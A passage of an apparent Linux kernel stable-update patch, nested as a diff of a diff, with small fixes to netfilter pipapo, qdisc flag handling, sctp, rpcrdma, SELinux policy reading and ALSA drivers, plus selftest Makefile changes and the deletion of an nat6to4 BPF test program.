+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
++	local = sta->sdata->local;
++	WARN_ONCE(local->hw.max_rx_aggregation_subframes > 64,
++		  "RX BA marker can't support max_rx_aggregation_subframes %u > 64\n",
++		  local->hw.max_rx_aggregation_subframes);
++
+ 	if (!ieee80211_rx_data_set_sta(&rx, sta, -1))
+ 		return;
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 4c2df7af73f76..3c5cac9bd9b70 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -10509,7 +10509,7 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 	deleted = 0;
+ 	mutex_lock(&nft_net->commit_mutex);
+ 	if (!list_empty(&nf_tables_destroy_list))
+-		rcu_barrier();
++		nf_tables_trans_destroy_flush_work();
+ again:
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+ 		if (nft_table_has_owner(table) &&
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 32cfd0a84b0e2..8c16681884b7e 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -901,12 +901,14 @@ static void pipapo_lt_bits_adjust(struct nft_pipapo_field *f)
+ static int pipapo_insert(struct nft_pipapo_field *f, const uint8_t *k,
+ 			 int mask_bits)
+ {
+-	int rule = f->rules++, group, ret, bit_offset = 0;
++	int rule = f->rules, group, ret, bit_offset = 0;
+ 
+-	ret = pipapo_resize(f, f->rules - 1, f->rules);
++	ret = pipapo_resize(f, f->rules, f->rules + 1);
+ 	if (ret)
+ 		return ret;
+ 
++	f->rules++;
++
+ 	for (group = 0; group < f->groups; group++) {
+ 		int i, v;
+ 		u8 mask;
+@@ -1051,7 +1053,9 @@ static int pipapo_expand(struct nft_pipapo_field *f,
+ 			step++;
+ 			if (step >= len) {
+ 				if (!masks) {
+-					pipapo_insert(f, base, 0);
++					err = pipapo_insert(f, base, 0);
++					if (err < 0)
++						return err;
+ 					masks = 1;
+ 				}
+ 				goto out;
+@@ -1234,6 +1238,9 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 		else
+ 			ret = pipapo_expand(f, start, end, f->groups * f->bb);
+ 
++		if (ret < 0)
++			return ret;
++
+ 		if (f->bsize > bsize_max)
+ 			bsize_max = f->bsize;
+ 
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 01d07e6a68119..e8f988e1c7e64 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1550,10 +1550,28 @@ static int tc_get_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 	return 0;
+ }
+ 
++static bool req_create_or_replace(struct nlmsghdr *n)
++{
++	return (n->nlmsg_flags & NLM_F_CREATE &&
++		n->nlmsg_flags & NLM_F_REPLACE);
++}
++
++static bool req_create_exclusive(struct nlmsghdr *n)
++{
++	return (n->nlmsg_flags & NLM_F_CREATE &&
++		n->nlmsg_flags & NLM_F_EXCL);
++}
++
++static bool req_change(struct nlmsghdr *n)
++{
++	return (!(n->nlmsg_flags & NLM_F_CREATE) &&
++		!(n->nlmsg_flags & NLM_F_REPLACE) &&
++		!(n->nlmsg_flags & NLM_F_EXCL));
++}
++
+ /*
+  * Create/change qdisc.
+  */
+-
+ static int tc_modify_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 			   struct netlink_ext_ack *extack)
+ {
+@@ -1647,27 +1665,35 @@ replay:
+ 				 *
+ 				 *   We know, that some child q is already
+ 				 *   attached to this parent and have choice:
+-				 *   either to change it or to create/graft new one.
++				 *   1) change it or 2) create/graft new one.
++				 *   If the requested qdisc kind is different
++				 *   than the existing one, then we choose graft.
++				 *   If they are the same then this is "change"
++				 *   operation - just let it fallthrough..
+ 				 *
+ 				 *   1. We are allowed to create/graft only
+-				 *   if CREATE and REPLACE flags are set.
++				 *   if the request is explicitly stating
++				 *   "please create if it doesn't exist".
+ 				 *
+-				 *   2. If EXCL is set, requestor wanted to say,
+-				 *   that qdisc tcm_handle is not expected
++				 *   2. If the request is to exclusive create
++				 *   then the qdisc tcm_handle is not expected
+ 				 *   to exist, so that we choose create/graft too.
+ 				 *
+ 				 *   3. The last case is when no flags are set.
++				 *   This will happen when for example tc
++				 *   utility issues a "change" command.
+ 				 *   Alas, it is sort of hole in API, we
+ 				 *   cannot decide what to do unambiguously.
+-				 *   For now we select create/graft, if
+-				 *   user gave KIND, which does not match existing.
++				 *   For now we select create/graft.
+ 				 */
+-				if ((n->nlmsg_flags & NLM_F_CREATE) &&
+-				    (n->nlmsg_flags & NLM_F_REPLACE) &&
+-				    ((n->nlmsg_flags & NLM_F_EXCL) ||
+-				     (tca[TCA_KIND] &&
+-				      nla_strcmp(tca[TCA_KIND], q->ops->id))))
+-					goto create_n_graft;
++				if (tca[TCA_KIND] &&
++				    nla_strcmp(tca[TCA_KIND], q->ops->id)) {
++					if (req_create_or_replace(n) ||
++					    req_create_exclusive(n))
++						goto create_n_graft;
++					else if (req_change(n))
++						goto create_n_graft2;
++				}
+ 			}
+ 		}
+ 	} else {
+@@ -1701,6 +1727,7 @@ create_n_graft:
+ 		NL_SET_ERR_MSG(extack, "Qdisc not found. To create specify NLM_F_CREATE flag");
+ 		return -ENOENT;
+ 	}
++create_n_graft2:
+ 	if (clid == TC_H_INGRESS) {
+ 		if (dev_ingress_queue(dev)) {
+ 			q = qdisc_create(dev, dev_ingress_queue(dev),
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index c806d272107ac..a11b0d903514c 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -98,7 +98,7 @@ struct percpu_counter sctp_sockets_allocated;
+ 
+ static void sctp_enter_memory_pressure(struct sock *sk)
+ {
+-	sctp_memory_pressure = 1;
++	WRITE_ONCE(sctp_memory_pressure, 1);
+ }
+ 
+ 
+@@ -9472,7 +9472,7 @@ void sctp_copy_sock(struct sock *newsk, struct sock *sk,
+ 	newinet->inet_rcv_saddr = inet->inet_rcv_saddr;
+ 	newinet->inet_dport = htons(asoc->peer.port);
+ 	newinet->pmtudisc = inet->pmtudisc;
+-	newinet->inet_id = get_random_u16();
++	atomic_set(&newinet->inet_id, get_random_u16());
+ 
+ 	newinet->uc_ttl = inet->uc_ttl;
+ 	newinet->mc_loop = 1;
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index b098fde373abf..28c0771c4e8c3 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -935,9 +935,6 @@ struct rpcrdma_rep *rpcrdma_rep_create(struct rpcrdma_xprt *r_xprt,
+ 	if (!rep->rr_rdmabuf)
+ 		goto out_free;
+ 
+-	if (!rpcrdma_regbuf_dma_map(r_xprt, rep->rr_rdmabuf))
+-		goto out_free_regbuf;
+-
+ 	rep->rr_cid.ci_completion_id =
+ 		atomic_inc_return(&r_xprt->rx_ep->re_completion_ids);
+ 
+@@ -956,8 +953,6 @@ struct rpcrdma_rep *rpcrdma_rep_create(struct rpcrdma_xprt *r_xprt,
+ 	spin_unlock(&buf->rb_lock);
+ 	return rep;
+ 
+-out_free_regbuf:
+-	rpcrdma_regbuf_free(rep->rr_rdmabuf);
+ out_free:
+ 	kfree(rep);
+ out:
+@@ -1363,6 +1358,10 @@ void rpcrdma_post_recvs(struct rpcrdma_xprt *r_xprt, int needed, bool temp)
+ 			rep = rpcrdma_rep_create(r_xprt, temp);
+ 		if (!rep)
+ 			break;
++		if (!rpcrdma_regbuf_dma_map(r_xprt, rep->rr_rdmabuf)) {
++			rpcrdma_rep_put(buf, rep);
++			break;
++		}
+ 
+ 		rep->rr_cid.ci_queue_id = ep->re_attr.recv_cq->res.id;
+ 		trace_xprtrdma_post_recv(rep);
+diff --git a/security/selinux/ss/policydb.c b/security/selinux/ss/policydb.c
+index adcfb63b3550d..6f9ff4643dcbc 100644
+--- a/security/selinux/ss/policydb.c
++++ b/security/selinux/ss/policydb.c
+@@ -2005,6 +2005,7 @@ static int filename_trans_read_helper(struct policydb *p, void *fp)
+ 		if (!datum)
+ 			goto out;
+ 
++		datum->next = NULL;
+ 		*dst = datum;
+ 
+ 		/* ebitmap_read() will at least init the bitmap */
+@@ -2017,7 +2018,6 @@ static int filename_trans_read_helper(struct policydb *p, void *fp)
+ 			goto out;
+ 
+ 		datum->otype = le32_to_cpu(buf[0]);
+-		datum->next = NULL;
+ 
+ 		dst = &datum->next;
+ 	}
+diff --git a/sound/pci/ymfpci/ymfpci.c b/sound/pci/ymfpci/ymfpci.c
+index 82d4e0fda91be..d62a0e2ddf609 100644
+--- a/sound/pci/ymfpci/ymfpci.c
++++ b/sound/pci/ymfpci/ymfpci.c
+@@ -150,8 +150,8 @@ static inline int snd_ymfpci_create_gameport(struct snd_ymfpci *chip, int dev, i
+ void snd_ymfpci_free_gameport(struct snd_ymfpci *chip) { }
+ #endif /* SUPPORT_JOYSTICK */
+ 
+-static int snd_card_ymfpci_probe(struct pci_dev *pci,
+-				 const struct pci_device_id *pci_id)
++static int __snd_card_ymfpci_probe(struct pci_dev *pci,
++				   const struct pci_device_id *pci_id)
+ {
+ 	static int dev;
+ 	struct snd_card *card;
+@@ -333,6 +333,12 @@ static int snd_card_ymfpci_probe(struct pci_dev *pci,
+ 	return 0;
+ }
+ 
++static int snd_card_ymfpci_probe(struct pci_dev *pci,
++				 const struct pci_device_id *pci_id)
++{
++	return snd_card_free_on_error(&pci->dev, __snd_card_ymfpci_probe(pci, pci_id));
++}
++
+ static struct pci_driver ymfpci_driver = {
+ 	.name = KBUILD_MODNAME,
+ 	.id_table = snd_ymfpci_ids,
+diff --git a/sound/soc/amd/Kconfig b/sound/soc/amd/Kconfig
+index 3968c478c9381..44d4e6e51a358 100644
+--- a/sound/soc/amd/Kconfig
++++ b/sound/soc/amd/Kconfig
+@@ -71,6 +71,7 @@ config SND_SOC_AMD_RENOIR_MACH
+ config SND_SOC_AMD_ACP5x
+ 	tristate "AMD Audio Coprocessor-v5.x I2S support"
+ 	depends on X86 && PCI
++	select SND_AMD_ACP_CONFIG
+ 	help
+ 	 This option enables ACP v5.x support on AMD platform
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index c1ca3ceac5f2f..9a9571c3f08c0 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -217,7 +217,7 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "82"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82V2"),
+ 		}
+ 	},
+ 	{
+@@ -248,6 +248,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "M6500RC"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index f2b5032daa6ae..2f4b0ee93aced 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -167,7 +167,7 @@ static int cs35l41_get_fs_mon_config_index(int freq)
+ static const DECLARE_TLV_DB_RANGE(dig_vol_tlv,
+ 		0, 0, TLV_DB_SCALE_ITEM(TLV_DB_GAIN_MUTE, 0, 1),
+ 		1, 913, TLV_DB_MINMAX_ITEM(-10200, 1200));
+-static DECLARE_TLV_DB_SCALE(amp_gain_tlv, 0, 1, 1);
++static DECLARE_TLV_DB_SCALE(amp_gain_tlv, 50, 100, 0);
+ 
+ static const struct snd_kcontrol_new dre_ctrl =
+ 	SOC_DAPM_SINGLE("Switch", CS35L41_PWR_CTRL3, 20, 1, 0);
+diff --git a/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh b/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh
+index 47ab90596acb2..6358df5752f90 100755
+--- a/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh
++++ b/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh
+@@ -57,8 +57,8 @@ ip link add name veth2-bond type veth peer name veth2-end
+ 
+ # add ports
+ ip link set fbond master fab-br0
+-ip link set veth1-bond down master fbond
+-ip link set veth2-bond down master fbond
++ip link set veth1-bond master fbond
++ip link set veth2-bond master fbond
+ 
+ # bring up
+ ip link set veth1-end up
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh b/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh
+index 7d9e73a43a49b..0c47faff9274b 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh
+@@ -98,12 +98,12 @@ sb_occ_etc_check()
+ 
+ port_pool_test()
+ {
+-	local exp_max_occ=288
++	local exp_max_occ=$(devlink_cell_size_get)
+ 	local max_occ
+ 
+ 	devlink sb occupancy clearmax $DEVLINK_DEV
+ 
+-	$MZ $h1 -c 1 -p 160 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
++	$MZ $h1 -c 1 -p 10 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
+ 		-t ip -q
+ 
+ 	devlink sb occupancy snapshot $DEVLINK_DEV
+@@ -126,12 +126,12 @@ port_pool_test()
+ 
+ port_tc_ip_test()
+ {
+-	local exp_max_occ=288
++	local exp_max_occ=$(devlink_cell_size_get)
+ 	local max_occ
+ 
+ 	devlink sb occupancy clearmax $DEVLINK_DEV
+ 
+-	$MZ $h1 -c 1 -p 160 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
++	$MZ $h1 -c 1 -p 10 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
+ 		-t ip -q
+ 
+ 	devlink sb occupancy snapshot $DEVLINK_DEV
+@@ -154,16 +154,12 @@ port_tc_ip_test()
+ 
+ port_tc_arp_test()
+ {
+-	local exp_max_occ=96
++	local exp_max_occ=$(devlink_cell_size_get)
+ 	local max_occ
+ 
+-	if [[ $MLXSW_CHIP != "mlxsw_spectrum" ]]; then
+-		exp_max_occ=144
+-	fi
+-
+ 	devlink sb occupancy clearmax $DEVLINK_DEV
+ 
+-	$MZ $h1 -c 1 -p 160 -a $h1mac -A 192.0.1.1 -t arp -q
++	$MZ $h1 -c 1 -p 10 -a $h1mac -A 192.0.1.1 -t arp -q
+ 
+ 	devlink sb occupancy snapshot $DEVLINK_DEV
+ 
+diff --git a/tools/testing/selftests/net/Makefile b/tools/testing/selftests/net/Makefile
+index 69c58362c0edf..48d1a68be1d52 100644
+--- a/tools/testing/selftests/net/Makefile
++++ b/tools/testing/selftests/net/Makefile
+@@ -71,14 +71,60 @@ TEST_GEN_FILES += bind_bhash
+ TEST_GEN_PROGS += sk_bind_sendto_listen
+ TEST_GEN_PROGS += sk_connect_zero_addr
+ TEST_PROGS += test_ingress_egress_chaining.sh
++TEST_GEN_FILES += nat6to4.o
+ 
+ TEST_FILES := settings
+ 
+ include ../lib.mk
+ 
+-include bpf/Makefile
+-
+ $(OUTPUT)/reuseport_bpf_numa: LDLIBS += -lnuma
+ $(OUTPUT)/tcp_mmap: LDLIBS += -lpthread
+ $(OUTPUT)/tcp_inq: LDLIBS += -lpthread
+ $(OUTPUT)/bind_bhash: LDLIBS += -lpthread
++
++# Rules to generate bpf obj nat6to4.o
++CLANG ?= clang
++SCRATCH_DIR := $(OUTPUT)/tools
++BUILD_DIR := $(SCRATCH_DIR)/build
++BPFDIR := $(abspath ../../../lib/bpf)
++APIDIR := $(abspath ../../../include/uapi)
++
++CCINCLUDE += -I../bpf
++CCINCLUDE += -I../../../../usr/include/
++CCINCLUDE += -I$(SCRATCH_DIR)/include
++
++BPFOBJ := $(BUILD_DIR)/libbpf/libbpf.a
++
++MAKE_DIRS := $(BUILD_DIR)/libbpf
++$(MAKE_DIRS):
++	mkdir -p $@
++
++# Get Clang's default includes on this system, as opposed to those seen by
++# '-target bpf'. This fixes "missing" files on some architectures/distros,
++# such as asm/byteorder.h, asm/socket.h, asm/sockios.h, sys/cdefs.h etc.
++#
++# Use '-idirafter': Don't interfere with include mechanics except where the
++# build would have failed anyways.
++define get_sys_includes
++$(shell $(1) $(2) -v -E - </dev/null 2>&1 \
++	| sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') \
++$(shell $(1) $(2) -dM -E - </dev/null | grep '__riscv_xlen ' | awk '{printf("-D__riscv_xlen=%d -D__BITS_PER_LONG=%d", $$3, $$3)}')
++endef
++
++ifneq ($(CROSS_COMPILE),)
++CLANG_TARGET_ARCH = --target=$(notdir $(CROSS_COMPILE:%-=%))
++endif
++
++CLANG_SYS_INCLUDES = $(call get_sys_includes,$(CLANG),$(CLANG_TARGET_ARCH))
++
++$(OUTPUT)/nat6to4.o: nat6to4.c $(BPFOBJ) | $(MAKE_DIRS)
++	$(CLANG) -O2 -target bpf -c $< $(CCINCLUDE) $(CLANG_SYS_INCLUDES) -o $@
++
++$(BPFOBJ): $(wildcard $(BPFDIR)/*.[ch] $(BPFDIR)/Makefile)		       \
++	   $(APIDIR)/linux/bpf.h					       \
++	   | $(BUILD_DIR)/libbpf
++	$(MAKE) $(submake_extras) -C $(BPFDIR) OUTPUT=$(BUILD_DIR)/libbpf/     \
++		    EXTRA_CFLAGS='-g -O0'				       \
++		    DESTDIR=$(SCRATCH_DIR) prefix= all install_headers
++
++EXTRA_CLEAN := $(SCRATCH_DIR)
+diff --git a/tools/testing/selftests/net/bpf/Makefile b/tools/testing/selftests/net/bpf/Makefile
+deleted file mode 100644
+index 8ccaf8732eb22..0000000000000
+--- a/tools/testing/selftests/net/bpf/Makefile
++++ /dev/null
+@@ -1,14 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0
+-
+-CLANG ?= clang
+-CCINCLUDE += -I../../bpf
+-CCINCLUDE += -I../../../../lib
+-CCINCLUDE += -I../../../../../usr/include/
+-
+-TEST_CUSTOM_PROGS = $(OUTPUT)/bpf/nat6to4.o
+-all: $(TEST_CUSTOM_PROGS)
+-
+-$(OUTPUT)/%.o: %.c
+-	$(CLANG) -O2 -target bpf -c $< $(CCINCLUDE) -o $@
+-
+-EXTRA_CLEAN := $(TEST_CUSTOM_PROGS)
+diff --git a/tools/testing/selftests/net/bpf/nat6to4.c b/tools/testing/selftests/net/bpf/nat6to4.c
+deleted file mode 100644
+index ac54c36b25fc8..0000000000000
+--- a/tools/testing/selftests/net/bpf/nat6to4.c
++++ /dev/null
+@@ -1,285 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * This code is taken from the Android Open Source Project and the author
+- * (Maciej Żenczykowski) has gave permission to relicense it under the
+- * GPLv2. Therefore this program is free software;
+- * You can redistribute it and/or modify it under the terms of the GNU
+- * General Public License version 2 as published by the Free Software
+- * Foundation
+-
+- * The original headers, including the original license headers, are
+- * included below for completeness.
+- *
+- * Copyright (C) 2019 The Android Open Source Project
+- *
+- * Licensed under the Apache License, Version 2.0 (the "License");
+- * you may not use this file except in compliance with the License.
+- * You may obtain a copy of the License at
+- *
+- *      http://www.apache.org/licenses/LICENSE-2.0
+- *
+- * Unless required by applicable law or agreed to in writing, software
+- * distributed under the License is distributed on an "AS IS" BASIS,
+- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+- * See the License for the specific language governing permissions and
+- * limitations under the License.
+- */
+-#include <linux/bpf.h>
+-#include <linux/if.h>
+-#include <linux/if_ether.h>
+-#include <linux/if_packet.h>
+-#include <linux/in.h>
+-#include <linux/in6.h>
+-#include <linux/ip.h>
+-#include <linux/ipv6.h>
+-#include <linux/pkt_cls.h>
+-#include <linux/swab.h>
+-#include <stdbool.h>
+-#include <stdint.h>
+-
+-
+-#include <linux/udp.h>
+-
+-#include <bpf/bpf_helpers.h>
+-#include <bpf/bpf_endian.h>
+-
+-#define IP_DF 0x4000  // Flag: "Don't Fragment"
+-
+-SEC("schedcls/ingress6/nat_6")
+-int sched_cls_ingress6_nat_6_prog(struct __sk_buff *skb)
+-{
+-	const int l2_header_size =  sizeof(struct ethhdr);
+-	void *data = (void *)(long)skb->data;
+-	const void *data_end = (void *)(long)skb->data_end;
+-	const struct ethhdr * const eth = data;  // used iff is_ethernet
+-	const struct ipv6hdr * const ip6 =  (void *)(eth + 1);
+-
+-	// Require ethernet dst mac address to be our unicast address.
+-	if  (skb->pkt_type != PACKET_HOST)
+-		return TC_ACT_OK;
+-
+-	// Must be meta-ethernet IPv6 frame
+-	if (skb->protocol != bpf_htons(ETH_P_IPV6))
+-		return TC_ACT_OK;
+-
+-	// Must have (ethernet and) ipv6 header
+-	if (data + l2_header_size + sizeof(*ip6) > data_end)
+-		return TC_ACT_OK;
+-
+-	// Ethertype - if present - must be IPv6
+-	if (eth->h_proto != bpf_htons(ETH_P_IPV6))
+-		return TC_ACT_OK;
+-
+-	// IP version must be 6
+-	if (ip6->version != 6)
+-		return TC_ACT_OK;
+-	// Maximum IPv6 payload length that can be translated to IPv4
+-	if (bpf_ntohs(ip6->payload_len) > 0xFFFF - sizeof(struct iphdr))
+-		return TC_ACT_OK;
+-	switch (ip6->nexthdr) {
+-	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
+-	case IPPROTO_UDP:  // address means there is no need to update their checksums.
+-	case IPPROTO_GRE:  // We do not need to bother looking at GRE/ESP headers,
+-	case IPPROTO_ESP:  // since there is never a checksum to update.
+-		break;
+-	default:  // do not know how to handle anything else
+-		return TC_ACT_OK;
+-	}
+-
+-	struct ethhdr eth2;  // used iff is_ethernet
+-
+-	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
+-	eth2.h_proto = bpf_htons(ETH_P_IP);  // But replace the ethertype
+-
+-	struct iphdr ip = {
+-		.version = 4,                                                      // u4
+-		.ihl = sizeof(struct iphdr) / sizeof(__u32),                       // u4
+-		.tos = (ip6->priority << 4) + (ip6->flow_lbl[0] >> 4),             // u8
+-		.tot_len = bpf_htons(bpf_ntohs(ip6->payload_len) + sizeof(struct iphdr)),  // u16
+-		.id = 0,                                                           // u16
+-		.frag_off = bpf_htons(IP_DF),                                          // u16
+-		.ttl = ip6->hop_limit,                                             // u8
+-		.protocol = ip6->nexthdr,                                          // u8
+-		.check = 0,                                                        // u16
+-		.saddr = 0x0201a8c0,                            // u32
+-		.daddr = 0x0101a8c0,                                         // u32
+-	};
+-
+-	// Calculate the IPv4 one's complement checksum of the IPv4 header.
+-	__wsum sum4 = 0;
+-
+-	for (int i = 0; i < sizeof(ip) / sizeof(__u16); ++i)
+-		sum4 += ((__u16 *)&ip)[i];
+-
+-	// Note that sum4 is guaranteed to be non-zero by virtue of ip.version == 4
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
+-	ip.check = (__u16)~sum4;                // sum4 cannot be zero, so this is never 0xFFFF
+-
+-	// Calculate the *negative* IPv6 16-bit one's complement checksum of the IPv6 header.
+-	__wsum sum6 = 0;
+-	// We'll end up with a non-zero sum due to ip6->version == 6 (which has '0' bits)
+-	for (int i = 0; i < sizeof(*ip6) / sizeof(__u16); ++i)
+-		sum6 += ~((__u16 *)ip6)[i];  // note the bitwise negation
+-
+-	// Note that there is no L4 checksum update: we are relying on the checksum neutrality
+-	// of the ipv6 address chosen by netd's ClatdController.
+-
+-	// Packet mutations begin - point of no return, but if this first modification fails
+-	// the packet is probably still pristine, so let clatd handle it.
+-	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IP), 0))
+-		return TC_ACT_OK;
+-	bpf_csum_update(skb, sum6);
+-
+-	data = (void *)(long)skb->data;
+-	data_end = (void *)(long)skb->data_end;
+-	if (data + l2_header_size + sizeof(struct iphdr) > data_end)
+-		return TC_ACT_SHOT;
+-
+-	struct ethhdr *new_eth = data;
+-
+-	// Copy over the updated ethernet header
+-	*new_eth = eth2;
+-
+-	// Copy over the new ipv4 header.
+-	*(struct iphdr *)(new_eth + 1) = ip;
+-	return bpf_redirect(skb->ifindex, BPF_F_INGRESS);
+-}
+-
+-SEC("schedcls/egress4/snat4")
+-int sched_cls_egress4_snat4_prog(struct __sk_buff *skb)
+-{
+-	const int l2_header_size =  sizeof(struct ethhdr);
+-	void *data = (void *)(long)skb->data;
+-	const void *data_end = (void *)(long)skb->data_end;
+-	const struct ethhdr *const eth = data;  // used iff is_ethernet
+-	const struct iphdr *const ip4 = (void *)(eth + 1);
+-
+-	// Must be meta-ethernet IPv4 frame
+-	if (skb->protocol != bpf_htons(ETH_P_IP))
+-		return TC_ACT_OK;
+-
+-	// Must have ipv4 header
+-	if (data + l2_header_size + sizeof(struct ipv6hdr) > data_end)
+-		return TC_ACT_OK;
+-
+-	// Ethertype - if present - must be IPv4
+-	if (eth->h_proto != bpf_htons(ETH_P_IP))
+-		return TC_ACT_OK;
+-
+-	// IP version must be 4
+-	if (ip4->version != 4)
+-		return TC_ACT_OK;
+-
+-	// We cannot handle IP options, just standard 20 byte == 5 dword minimal IPv4 header
+-	if (ip4->ihl != 5)
+-		return TC_ACT_OK;
+-
+-	// Maximum IPv6 payload length that can be translated to IPv4
+-	if (bpf_htons(ip4->tot_len) > 0xFFFF - sizeof(struct ipv6hdr))
+-		return TC_ACT_OK;
+-
+-	// Calculate the IPv4 one's complement checksum of the IPv4 header.
+-	__wsum sum4 = 0;
+-
+-	for (int i = 0; i < sizeof(*ip4) / sizeof(__u16); ++i)
+-		sum4 += ((__u16 *)ip4)[i];
+-
+-	// Note that sum4 is guaranteed to be non-zero by virtue of ip4->version == 4
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
+-	// for a correct checksum we should get *a* zero, but sum4 must be positive, ie 0xFFFF
+-	if (sum4 != 0xFFFF)
+-		return TC_ACT_OK;
+-
+-	// Minimum IPv4 total length is the size of the header
+-	if (bpf_ntohs(ip4->tot_len) < sizeof(*ip4))
+-		return TC_ACT_OK;
+-
+-	// We are incapable of dealing with IPv4 fragments
+-	if (ip4->frag_off & ~bpf_htons(IP_DF))
+-		return TC_ACT_OK;
+-
+-	switch (ip4->protocol) {
+-	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
+-	case IPPROTO_GRE:  // address means there is no need to update their checksums.
+-	case IPPROTO_ESP:  // We do not need to bother looking at GRE/ESP headers,
+-		break;         // since there is never a checksum to update.
+-
+-	case IPPROTO_UDP:  // See above comment, but must also have UDP header...
+-		if (data + sizeof(*ip4) + sizeof(struct udphdr) > data_end)
+-			return TC_ACT_OK;
+-		const struct udphdr *uh = (const struct udphdr *)(ip4 + 1);
+-		// If IPv4/UDP checksum is 0 then fallback to clatd so it can calculate the
+-		// checksum.  Otherwise the network or more likely the NAT64 gateway might
+-		// drop the packet because in most cases IPv6/UDP packets with a zero checksum
+-		// are invalid. See RFC 6935.  TODO: calculate checksum via bpf_csum_diff()
+-		if (!uh->check)
+-			return TC_ACT_OK;
+-		break;
+-
+-	default:  // do not know how to handle anything else
+-		return TC_ACT_OK;
+-	}
+-	struct ethhdr eth2;  // used iff is_ethernet
+-
+-	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
+-	eth2.h_proto = bpf_htons(ETH_P_IPV6);  // But replace the ethertype
+-
+-	struct ipv6hdr ip6 = {
+-		.version = 6,                                    // __u8:4
+-		.priority = ip4->tos >> 4,                       // __u8:4
+-		.flow_lbl = {(ip4->tos & 0xF) << 4, 0, 0},       // __u8[3]
+-		.payload_len = bpf_htons(bpf_ntohs(ip4->tot_len) - 20),  // __be16
+-		.nexthdr = ip4->protocol,                        // __u8
+-		.hop_limit = ip4->ttl,                           // __u8
+-	};
+-	ip6.saddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
+-	ip6.saddr.in6_u.u6_addr32[1] = 0;
+-	ip6.saddr.in6_u.u6_addr32[2] = 0;
+-	ip6.saddr.in6_u.u6_addr32[3] = bpf_htonl(1);
+-	ip6.daddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
+-	ip6.daddr.in6_u.u6_addr32[1] = 0;
+-	ip6.daddr.in6_u.u6_addr32[2] = 0;
+-	ip6.daddr.in6_u.u6_addr32[3] = bpf_htonl(2);
+-
+-	// Calculate the IPv6 16-bit one's complement checksum of the IPv6 header.
+-	__wsum sum6 = 0;
+-	// We'll end up with a non-zero sum due to ip6.version == 6
+-	for (int i = 0; i < sizeof(ip6) / sizeof(__u16); ++i)
+-		sum6 += ((__u16 *)&ip6)[i];
+-
+-	// Packet mutations begin - point of no return, but if this first modification fails
+-	// the packet is probably still pristine, so let clatd handle it.
+-	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IPV6), 0))
+-		return TC_ACT_OK;
+-
